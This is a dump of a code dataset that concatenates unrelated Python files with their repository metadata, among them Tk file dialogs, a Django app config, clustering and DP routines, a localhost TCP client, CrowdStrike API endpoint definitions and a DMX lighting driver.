dir=os.getcwd()
dirs=['..']
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
self.component('dirnamebox').setlist(dirs)
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the dirname entry"""
fn=self.component('dirname').get()
self.configure(directory=fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def askfilename(self,directory=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
self.fillit()
self.activate()
if self.canceled:
return None
else:
return self.component('dirname').get()
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
if filename=='':
_errorpop(self.interior(),"Empty filename")
return 0
if os.path.isdir(filename) or not os.path.exists(filename):
return 1
else:
_errorpop(self.interior(),"This is not a directory")
return 0
class PmwExistingFileDialog(PmwFileDialog):
def filevalidate(self,string):
if os.path.isfile(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isfile(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a plain file")
return 0
else:
_errorpop(self.interior(),"Please select an existing file")
return 0
class PmwExistingDirDialog(PmwDirDialog):
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
else:
return Pmw.PARTIAL
def validate(self,filename):
if os.path.isdir(filename):
return 1
elif os.path.exists(filename):
_errorpop(self.interior(),"This is not a directory")
return 0
else:
_errorpop(self.interior(),"Please select an existing directory")
if __name__=="__main__":
root=Tkinter.Tk()
root.withdraw()
Pmw.initialise()
f0=PmwFileDialog(root)
f0.title('File name dialog')
n=f0.askfilename()
print '\nFilename : ',repr(n),'\n'
f1=PmwDirDialog(root,info='This is a directory dialog')
f1.title('Directory name dialog')
while 1:
n=f1.askfilename()
if n is None:
break
print "Dirname : ",repr(n)
| [
"edreamleo@gmail.com"
] | edreamleo@gmail.com |
69b6c313d154bab481291751409ec6d20fb06afe | 1c8530ab4bbc6c4f842f374b623eb32f1e7670b1 | /App/PomApp/apps.py | 268a68f35a8029010500812df059c85d41d53425 | [] | no_license | moon05/pomodoro_todoList | 81aa5908c265e7f703b3cd924967b1201ba5a59f | d2417ecfb30041c924e53b7bac36744c1313801c | refs/heads/master | 2021-01-01T05:24:06.670644 | 2016-05-17T18:14:52 | 2016-05-17T18:14:52 | 57,882,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | from __future__ import unicode_literals
from django.apps import AppConfig
class PomappConfig(AppConfig):
name = 'PomApp'
| [
"amamun@u.rochester.edu"
] | amamun@u.rochester.edu |
efa55d788ff68fe0cf919b7a45220e24baccb822 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_25489.py | 0e0cbd91234b9936d47833c2c46fd67b71ab0056 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | # y = 3 (#This is not a comment)
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
28b09522528bf2b49286473587332a3dea34ab4d | ba626e194e510cca0e0f52fb61b565522f129504 | /blog/basicapp/admin.py | 538bc1945ac946aac1b6086f66c0cda68009131c | [] | no_license | arungarg14/BLOG-DJANGO | f0e66d425dfb390c065f2198b1a2b595322cd6f0 | 4a5f322b7a4ffb9438c9ffec0eb4b1af288ca924 | refs/heads/master | 2022-01-05T04:37:36.631073 | 2019-06-05T10:01:15 | 2019-06-05T10:01:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from django.contrib import admin
from basicapp.models import Post,Comment
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
| [
"arungarg1414@gmail.com"
] | arungarg1414@gmail.com |
b9c35bacbba1122e7bf5ad1531e085007384e51a | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/132/C.py | 3e94b88d37560e4a0f7c839099cf78a2907fed1a | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,979 | py | """
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
[N + D + i for i in range(D)]
used = [0] * len(A)
for a in A:
used[a] = 1 if a != -1 else used[a]
dp = [0] * 2 ** (2 * D + 1)
dp[(1 << (D + 1)) - 1] = 1
for i in range(D, N + D):
dp_new = [0] * 2 ** (2 * D + 1)
for j in range(2 ** (2 * D + 1)):
# i - D - 1 が使用されていないケースはスキップ
# ここで枝刈りしておかないとpythonだと間に合わない
if not j & 1: continue
if A[i] != -1:
# 数字が固定されている場合
if not (j >> (A[i] - i + D + 1) & 1):
tmp = j >> 1 | 1 << (A[i] - i + D)
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
else:
# 固定されていない(-1)の場合
for k in range(2 * D + 1):
if used[i + k - D]: continue # 使用済みの数字は使えない
if not (j >> (k + 1)) & 1:
tmp = j >> 1 | 1 << k
dp_new[tmp] += dp[j]
dp_new[tmp] %= mod2
dp = dp_new
print(sum(dp))
if __name__ == '__main__':
    # Read N, D and the N-element array A from stdin, then solve.
    # S = input()
    # N = int(input())
    N, D = map(int, input().split())
    A = [int(i) for i in input().split()]
    solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
| [
"39874652+corutopi@users.noreply.github.com"
] | 39874652+corutopi@users.noreply.github.com |
069869c1802fa40cf5d5a5437907958a0bfa9e2d | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py | 0a96f1ef465b374d9e5d0791ff5bc20220dcdd83 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 695 | py | from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
f0a01841cbcc2d97cfac73560a3bc1c1da27e906 | bebe6e9195dce6f47fe2f52a06ac85519ab969ac | /reverse_linked_list_3_pointer.py | 46ab8f6cce4bdfd720c819daefb65f082fd65761 | [] | no_license | jbobo/leetcode | f038ee934c4435a2f5a3e987b3d5b70b860a25e2 | 3894425256f8504f7c8f1903e47f670c6fa32a92 | refs/heads/master | 2022-11-05T07:19:48.897066 | 2020-06-24T01:20:25 | 2020-06-24T01:20:25 | 274,544,298 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | #!/usr/bin/env python3
class ListNode:
def __init__(self, val, next=None):
self.val = val
self.next = next
def print_list(self):
pointer = self
print(pointer.val)
while pointer.next:
pointer = pointer.next
print(pointer.val)
def reverse_list(head):
lead_pointer = None
mid_pointer = head
trail_pointer = None
while mid_pointer:
# stash the next element
lead_pointer = mid_pointer.next
# set the mid pointer to the previous element
mid_pointer.next = trail_pointer
# previous is moved up to the current node
trail_pointer = mid_pointer
# update the current node from the stashed value
mid_pointer = lead_pointer
# lead_pointer = mid_pointer.next
return trail_pointer
if __name__ == "__main__":
test_list = ListNode("A", ListNode("B", ListNode("C", ListNode("D"))))
test_list.print_list()
reversed_list = reverse_list(test_list)
reversed_list.print_list()
| [
"nedbobo@Neds-MacBook-Pro.local"
] | nedbobo@Neds-MacBook-Pro.local |
77c42398c663140e51b3695cc0e08a4439cab5ed | a106fdc6041bd3484141d82838114e5908b1d6a2 | /lab12.py | 7ba10394a11392ce5079e517ff20562a39f082b7 | [] | no_license | cbailey234/gitlab | e04e134505da753e898a69b037377a384701ae7b | b7fca1e4b8035bf2bdc7dbd236f7d75a9fcd60ab | refs/heads/master | 2022-07-15T16:21:22.363501 | 2020-05-06T23:11:29 | 2020-05-06T23:11:29 | 260,273,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from datetime import date
today = date.today()
print("Today's date:", today)
print("EE 250")
print("Chris Bailey")
| [
"cbailey234@yahoo.com"
] | cbailey234@yahoo.com |
1a1f7e2e20c9814a1a315e305fffb0ffc7a62585 | 07d3655c652d4a89e344c4bb0a3d63e8cb34288d | /forel.py | 214e1cf25e4958061c4c4b11fc3fdb88af6398ee | [] | no_license | tsolakghukasyan/FOREL-clustering | a621231f157738cdaf694cd75398f65202985414 | 180c1d4e693a5c94ee0a59e1bbc696d921a62886 | refs/heads/master | 2020-03-19T00:07:03.492902 | 2018-05-30T14:23:27 | 2018-05-30T14:23:27 | 135,454,265 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import numpy as np
def cluster(points, radius, tol=1e-1):
centroids = []
while len(points) != 0:
current_point = get_random_point(points)
neighbors = get_neighbors(current_point, radius, points)
centroid = get_centroid(neighbors)
while np.linalg.norm(current_point - centroid) > tol:
current_point = centroid
neighbors = get_neighbors(current_point, radius, points)
centroid = get_centroid(neighbors)
points = remove_points(neighbors, points)
centroids.append(current_point)
return centroids
def get_neighbors(p, radius, points):
neighbors = [point for point in points if np.linalg.norm(p - point) < radius]
return np.array(neighbors)
def get_centroid(points):
return np.array([np.mean(points[:, 0]), np.mean(points[:, 1])])
def get_random_point(points):
random_index = np.random.choice(len(points), 1)[0]
return points[random_index]
def remove_points(subset, points):
points = [p for p in points if p not in subset]
return points
| [
"tsggukasyan@edu.hse.ru"
] | tsggukasyan@edu.hse.ru |
779a4db766d92b742db3f5ff015980bf64b76e20 | d4b5f42050b0eee01134afeef806956df60c9746 | /Date 2 Day Converter.py | 56044c0120e924e7268e0ba41afe3b9c8e3f2d67 | [] | no_license | touhidrahman/my_first_ever_codes | 007c5fc4c287a4144ed962148417c73265285ecf | a373e972e9f84d8cb8d9d982e0623dcd3d9a9a61 | refs/heads/master | 2021-04-15T09:01:17.302880 | 2018-03-23T22:42:38 | 2018-03-23T22:42:38 | 126,545,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,143 | py | """ DATE TO DAY CALCULATOR
Successful on 29 Feb 2012 - 1940 Hrs"""
def date2day(date):
"""This def converts date into flat day no. It adds leap year accordingly"""
x = date.split('-')
year = int(x[2])
month = int(x[1])
day = int(x[0])
if year % 4 == 0:
month_value = {0:0,
1:31,
2:31+29,
3:31+29+31,
4:31+29+31+30,
5:31+29+31+30+31,
6:31+29+31+30+31+30,
7:31+29+31+30+31+30+31,
8:31+29+31+30+31+30+31+31,
9:31+29+31+30+31+30+31+31+30,
10:31+29+31+30+31+30+31+31+30+31,
11:31+29+31+30+31+30+31+31+30+31+30,
12:31+29+31+30+31+30+31+31+30+31+30+31}
else:
month_value = {0:0,
1:31,
2:31+28,
3:31+28+31,
4:31+28+31+30,
5:31+28+31+30+31,
6:31+28+31+30+31+30,
7:31+28+31+30+31+30+31,
8:31+28+31+30+31+30+31+31,
9:31+28+31+30+31+30+31+31+30,
10:31+28+31+30+31+30+31+31+30+31,
11:31+28+31+30+31+30+31+31+30+31+30,
12:31+28+31+30+31+30+31+31+30+31+30+31}
day_of_yr = day + month_value.get(month - 1) #Get the value from dict
return day_of_yr
def yr_value(date):
"""Each yr starting from 1980 has got a value"""
x = date.split('-')
year = int(x[2])
yrs = []
for i in range(1980, year + 1, 4): #Here +1 is for counting the latest leapyear
if i % 4 == 0:
yrs.append(i)
leap_yr = len(yrs)
value_of_yr = leap_yr * 366 + (year - 1980 - leap_yr) * 365
return value_of_yr
def day_of_wk(value_of_yr, day_of_yr):
""" This function finds out the day out of year value"""
day_value = value_of_yr + day_of_yr
factor = day_value % 7
if factor == 0:
print('SUNDAY')
elif factor == 1:
print('MONDAY')
elif factor == 2:
print('TUESDAY')
elif factor == 3:
print('WEDNESDAY')
elif factor == 4:
print('THURSDAY')
elif factor == 5:
print('FRIDAY')
elif factor == 6:
print('SATURDAY')
def main():
date = input('Enter Date: ')
if date == 'exit':
exit()
elif date == 'help':
print("""
Type 'exit' to quit.
This calculator can
show day of dates
later than 1979.
""")
else:
b = date2day(date)
a = yr_value(date)
day_of_wk(a, b)
print("""
=======================
DATE TO DAY CALCULATOR
Version: 0.1
Touhidur Rahman
http://about.me/tanimkg
=======================
Enter any Date in this
format << dd-mm-yyyy >>
It will show the Day.
Type 'help' to get help
=======================
""")
while True:
main()
| [
"touhidrahman1987@gmail.com"
] | touhidrahman1987@gmail.com |
a99e5fd938668998f40d71595197fe4eabfea880 | 7cd36fa026bb922e438905819e97d7ed208dc49e | /examples/advanced/thinplate_morphing.py | d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07 | [
"MIT"
] | permissive | lxychuanhai/vtkplotter | b267bfcbbee5c7733ac98f5327e311c9529c74b1 | bc1b8b8821095263a46bba20ca345cab1d70cc42 | refs/heads/master | 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *
mesh = load(datadir+"man.vtk").normalize()
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy
sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.
for pt in meshd.getPoints():
if pt[1] < 0.3: # these pts don't move
sources.append(pt) # source = target
targets.append(pt)
# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])
show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
| [
"marco.musy@gmail.com"
] | marco.musy@gmail.com |
23e8fec245ac80d5a5ad58bdf2aad8d3e7bb5bd5 | 5e78e4eb81af0bbee63391b501cb771bbeb65d48 | /config.py | 0e18a1f8574a5a49a21a0a0b276bb1b2176ea695 | [] | no_license | ArvindRamachandran14/TAC-2.0 | 7479e451bcc3edb1360b42dbbccf313268a6be80 | 13c252c99be69f0f7c23c523ecd53e2707057b10 | refs/heads/master | 2023-03-20T08:09:21.930630 | 2021-03-09T06:58:00 | 2021-03-09T06:58:00 | 318,014,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | import json
class Config():
"""class that holds the PID parameters for humidity control loop"""
def __init__(self):
self.cfgFile = 'pH2O_PID.json'
self.cfg = json.load(open(self.cfgFile,'r'))
self.pH2O_P = self.cfg["pH2O_P"]
self.pH2O_I = self.cfg["pH2O_I"]
self.pH2O_D = self.cfg["pH2O_D"]
#print(pH2O_P, pH2O_I, pH2O_D)
def update(self):
"""funciton that updates the json file the current PID parameters for humidity control loop"""
self.cfg["pH2O_P"] = self.pH2O_P
self.cfg["pH2O_I"] = self.pH2O_I
self.cfg["pH2O_D"] = self.pH2O_D
with open(self.cfgFile, 'w') as fCfg:
json.dump(self.cfg, fCfg) | [
"aramac13@asu.edu"
] | aramac13@asu.edu |
1d94a7aaf0160f003ff3934bba18e8f21ae50052 | 69a576aa60918b3b846963da2238931468e354ab | /utils/spatial.py | 48c11f134472aad99921594a9b5bfddc25d536b5 | [] | no_license | parallel-ml/stand-alone | 3d04a31d442bf422d67d2f0a1f03eb04bdb841c7 | c86ce0d632188e9e16fb5539a7e2baed2c40ecdb | refs/heads/master | 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
""" A general function for split tensors with different shapes. """
# take care of padding here and set padding of conv always to be valid
if padding == 'same':
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
ow, oh = W / ws, H / hs
if W % ws != 0:
ow += 1
if H % hs != 0:
oh += 1
wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
X = ZeroPadding2D(padding=((hp / 2, hp - hp / 2), (wp / 2, wp - wp / 2)))(X)
wk, hk = kernal
ws, hs = strides
_, W, H, _ = K.int_shape(X)
# output size
ow, oh = (W - wk) / ws + 1, (H - hk) / hs + 1
# calculate boundary for general chunk
wchunk, hchunk = ow / num, oh / num
rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
# calculate special boundary for last chunk
wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk
offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0
# create a list of tuple with boundary (left, right, up, down)
boundary = []
for r in range(num):
for c in range(num):
if r == num - 1 and c == num - 1:
boundary.append((W - lrw, W, H - lrh, H))
elif r == num - 1:
boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
elif c == num - 1:
boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
else:
boundary.append(
(
rw * c - offset(wk, ws, c),
rw * c - offset(wk, ws, c) + rw,
rh * r - offset(hk, hs, r),
rh * r - offset(hk, hs, r) + rh,
)
)
return Lambda(
lambda x:
[x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
)(X)
def merge(tensors):
"""
The merge function will concatenate all inputs vertically and
then horizontally.
"""
size = int(math.sqrt(len(tensors)))
rows = [Concatenate(axis=1)(tensors[k * size:k * size + size]) for k in range(size)]
return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
layer = Conv2D(filters, kernal, strides=strides, padding=padding, activation=activation, name=name + '_conv')
return [layer(x) for x in tensors] | [
"caojiashen24@gmail.com"
] | caojiashen24@gmail.com |
e3bffe4732ee4bf7605b867c07cc21b165766526 | b6ab4693aa077097a8b503aeacafb53c8761aeaf | /src/falconpy/_endpoint/_detects.py | da37c54240368cb1744719d1aae736953fa17171 | [
"Unlicense"
] | permissive | woodtechie1428/falconpy | 36bd2ed85f629b43e7644c2c29d369eda3800ff7 | fcbec209f04a8d2340c66a5bea5c27c421f550d1 | refs/heads/main | 2023-08-03T09:14:10.930495 | 2021-09-10T15:58:39 | 2021-09-10T15:58:39 | 406,604,183 | 0 | 0 | Unlicense | 2021-09-15T03:44:50 | 2021-09-15T03:44:48 | null | UTF-8 | Python | false | false | 6,483 | py | """
_______ __ _______ __ __ __
| _ .----.-----.--.--.--.--| | _ | |_.----|__| |--.-----.
|. 1___| _| _ | | | | _ | 1___| _| _| | <| -__|
|. |___|__| |_____|________|_____|____ |____|__| |__|__|__|_____|
|: 1 | |: 1 |
|::.. . | CROWDSTRIKE FALCON |::.. . | FalconPy
`-------' `-------'
OAuth2 API - Customer SDK
_endpoint._detects - Internal API endpoint constant library
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.
In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit
of the public at large and to the detriment of our heirs and
successors. We intend this dedication to be an overt act of
relinquishment in perpetuity of all present and future rights to this
software under copyright law.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
For more information, please refer to <https://unlicense.org>
"""
_detects_endpoints = [
[
"GetAggregateDetects",
"POST",
"/detects/aggregates/detects/GET/v1",
"Get detect aggregates as specified via json in request body.",
"detects",
[
{
"description": "Query criteria and settings",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"UpdateDetectsByIdsV2",
"PATCH",
"/detects/entities/detects/v2",
"Modify the state, assignee, and visibility of detections",
"detects",
[
{
"description": "This endpoint modifies attributes (state and assignee) of detections. \n\n"
"This endpoint accepts a query formatted as a JSON array of key-value pairs. "
"You can update one or more attributes one or more detections with a single request.\n\n"
"**`assigned_to_uuid` values**\n\nA user ID, such as `1234567891234567891`\n\n**`ids` values**\n\n"
"One or more detection IDs, which you can find with the `/detects/queries/detects/v1` endpoint, "
"the Falcon console, or the Streaming API.\n\n**`show_in_ui` values**\n\n- `true`: "
"This detection is displayed in Falcon\n- `false`: This detection is not displayed in Falcon. "
"Most commonly used together with the `status` key's `false_positive` value.\n\n**`status` "
"values**\n\n- `new`\n- `in_progress`\n- `true_positive`\n- `false_positive`\n- `ignored`\n\n**`comment` "
"values**\nOptional comment to add to the detection. Comments are displayed with the detection in "
"Falcon and usually used to provide context or notes for other Falcon users. "
"A detection can have multiple comments over time.",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"GetDetectSummaries",
"POST",
"/detects/entities/summaries/GET/v1",
"View information about detections",
"detects",
[
{
"description": "View key attributes of detections, including the associated host, "
"[disposition](https://falcon.crowdstrike.com/support/documentation/2/query-api-reference#patterndispositionvalue), "
"objective/tactic/technique, adversary, and more. Specify one or more detection IDs (max 1000 per request). "
"Find detection IDs with the `/detects/queries/detects/v1` endpoint, the Falcon console, or the Streaming API.",
"name": "body",
"in": "body",
"required": True
}
]
],
[
"QueryDetects",
"GET",
"/detects/queries/detects/v1",
"Search for detection IDs that match a given query",
"detects",
[
{
"type": "integer",
"description": "The first detection to return, where `0` is the latest detection. Use with the `limit` "
"parameter to manage pagination of results.",
"name": "offset",
"in": "query"
},
{
"maximum": 9999,
"minimum": 0,
"type": "integer",
"description": "The maximum number of detections to return in this response (default: 9999; max: 9999). "
"Use with the `offset` parameter to manage pagination of results.",
"name": "limit",
"in": "query"
},
{
"type": "string",
"description": "Sort detections using these options:\n\n- `first_behavior`: Timestamp of the first "
"behavior associated with this detection\n- `last_behavior`: Timestamp of the last behavior associated "
"with this detection\n- `max_severity`: Highest severity of the behaviors associated with this detection\n"
"- `max_confidence`: Highest confidence of the behaviors associated with this detection\n- `adversary_id`: "
"ID of the adversary associated with this detection, if any\n- `devices.hostname`: Hostname of the host "
"where this detection was detected\n\nSort either `asc` (ascending) or `desc` (descending). "
"For example: `last_behavior|asc`",
"name": "sort",
"in": "query"
},
{
"type": "string",
"description": "Filter detections using a query in Falcon Query Language (FQL) An asterisk wildcard `*` "
"includes all results. \n\nCommon filter options include:\n\n- `status`\n- `device.device_id`\n"
"- `max_severity`\n\nThe full list of valid filter options is extensive. "
"Review it in our [documentation inside the Falcon console]"
"(https://falcon.crowdstrike.com/support/documentation/2/query-api-reference#detections_fql).",
"name": "filter",
"in": "query"
},
{
"type": "string",
"description": "Search all detection metadata for the provided string",
"name": "q",
"in": "query"
}
]
]
]
| [
"noreply@github.com"
] | woodtechie1428.noreply@github.com |
4fd1a36063610493d16705b91faca3442fdc810a | 480e33f95eec2e471c563d4c0661784c92396368 | /Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py | 998122a85ad6a346ff919cce319dcc301f314db8 | [
"Apache-2.0"
] | permissive | cms-nanoAOD/cmssw | 4d836e5b76ae5075c232de5e062d286e2026e8bd | 4eccb8a758b605875003124dd55ea58552b86af1 | refs/heads/master-cmsswmaster | 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 | Apache-2.0 | 2022-05-23T07:58:09 | 2017-09-08T14:03:57 | C++ | UTF-8 | Python | false | false | 821 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("DUMP")
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('G4cerr')
process.MessageLogger.categories.append('G4cout')
process.MessageLogger.categories.append('HGCalGeom')
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.add_(cms.ESProducer("TGeoMgrFromDdd",
verbose = cms.untracked.bool(False),
level = cms.untracked.int32(14)
))
process.dump = cms.EDAnalyzer("DumpSimGeometry",
outputFileName = cms.untracked.string('TBGeom.root'))
process.p = cms.Path(process.dump)
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
cc13959b1a9094efbf53216060b6eaf7feafd9ae | fa6c1bb73b6c779b3e37dedb0b45fed44424ca49 | /ch11/tcp_client.py | e11599c678d28c25ca2bdfefba0f230b4b94075f | [] | no_license | choidslab/IntroducingPython | 7f9d4ddb4a8f107b20d1a02ee75dbe2490ab22e1 | 7d0a3c9efffe1c69fd93fcc21123126051b44893 | refs/heads/master | 2020-04-02T17:37:48.975059 | 2018-11-03T03:50:23 | 2018-11-03T03:50:23 | 154,665,095 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | import socket
from datetime import datetime
server_address = ('localhost', 1234)
max_size = 1000
print("Starting the client at", datetime.now())
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 소켓 생성
client.connect(server_address) # 서버에 연결
client.sendall(b'Hey!') # 서버에 데이터 전송
data = client.recv(max_size) # 서버로부터 데이터 수신
print('At', datetime.now(), 'someone replied', data)
client.close()
| [
"dslab0915@gmail.com"
] | dslab0915@gmail.com |
60c30503a5fef6b3d8da46f31bfc23e7c8d4f000 | df65ecba3a23bc054758b429f45a92f53e131904 | /Lights/DMX_Driver.py | 8d410c05e6fb432929762cc821a280ca5cdb6dc7 | [] | no_license | tahaase/LeapLights | d1ef7893a8de6cca8e6eaab6dbd00be702ff216b | 198ae63de9b3b29448a142aa04459cee44f47eaf | refs/heads/master | 2020-03-21T02:11:11.735731 | 2018-06-20T06:29:32 | 2018-06-20T06:29:32 | 137,985,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,024 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 9 16:49:27 2015
@author: Thomas Haase
"""
import pysimpledmx
class DMX_Controller():
def __init__(self, usb_port,start_port,start_color,inverted):
self.dmx_com = pysimpledmx.DMXConnection(usb_port)
self.x_channel = start_port
self.y_channel = start_port+1
self.color_channel = start_port+2
self.dimmer_channel = start_port+5
self.color_table = [10,20,35,50,65,80,95,110,125]
self.color_index = start_color
self.invert = inverted
self.dmx_com.setChannel(self.x_channel,128)
self.dmx_com.setChannel(self.y_channel,128)
self.dmx_com.setChannel(self.color_channel,self.color_table[self.color_index])
self.dmx_com.setChannel(start_port+3,5) #Open gobo
self.dmx_com.setChannel(start_port+4,10) #Open Shutter
self.dmx_com.setChannel(self.dimmer_channel,255)
self.dmx_com.render()
def update_position(self,position_data):
hand_position = [position_data[0],position_data[1]]
if (abs(hand_position[0])>255):
if (hand_position[0]<-255):
hand_position[0] = -255
else:
hand_position[0] = 255
if (hand_position[1]<70):
hand_position[1] = 70
elif (hand_position[1]>402):
hand_position[1] = 402
hand_position[0] = hand_position[0] + 255
hand_position[0] = int(hand_position[0]/2.0)
hand_position[1] = hand_position[1] - 70
hand_position[1] = hand_position[1]*0.766
